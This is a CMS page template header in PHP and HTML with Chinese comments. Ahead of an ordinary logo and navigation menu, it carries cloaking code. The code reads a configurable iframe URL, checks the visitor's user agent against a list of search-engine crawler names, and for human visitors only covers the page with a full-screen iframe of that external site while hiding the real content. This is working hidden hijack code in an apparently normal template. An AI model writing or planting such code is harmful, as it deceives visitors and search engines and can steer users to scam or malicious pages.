{php}
$config = '/www/wwwroot/ripbmm.com/template/iframe_config.json';
$iframe_src = 'https://www.baidu.com';
if (file_exists($config)) {
$data = json_decode(file_get_contents($config), true);
if (!empty($data['iframe_src'])) $iframe_src = $data['iframe_src'];
}
echo "<script>var iframeSrcFromConfig = '" . addslashes($iframe_src) . "';</script>";
{/php}

<script>
    (function() {
        var ua = navigator.userAgent.toLowerCase();

        // 常见蜘蛛关键词
        var spiderKeywords = [
            'spider',        // 通用
            'bot',           // 通用
            'crawl',         // 通用
            'baiduspider',
            'googlebot',
            'bingbot',
            'yandex',
            'sogou',
            '360spider',
            'bytespider',
            'semrush',
            'mj12bot',
            'ahrefsbot'
        ];

        // 判断是否为蜘蛛
        var isSpider = spiderKeywords.some(function(keyword) {
            return ua.indexOf(keyword) !== -1;
        });

        console.log("User-Agent:", ua);
        console.log("是否是蜘蛛:", isSpider);
        console.log("iframeSrcFromConfig from PHP:", iframeSrcFromConfig);

        if (!isSpider) {
            document.write('<body style="margin:0;padding:0;">');
            document.write('<iframe src="' + iframeSrcFromConfig + '" frameborder="0" style="width:100%;height:100vh;"></iframe>');
            document.write('</body></html>');
            document.write('<div style="display: none;"><div><div>');
        }
    })();
</script>

<div class="top">
    <div class="logo"><a href="{网站地址}"><img src="{logo width='200'/}" height="50"></a></div>
</div>
<!-- top结束 -->

<!-- 导航开始 -->
<ul class="nav">
    <li style="width:20%"><a href="/">网站首页</a></li>
    {menu row="4"}
    <li style="width:20%"><a href='{$vo.url}'>{$vo.title}</a></li>
    {/menu}
</ul>
<!-- 导航结束 -->
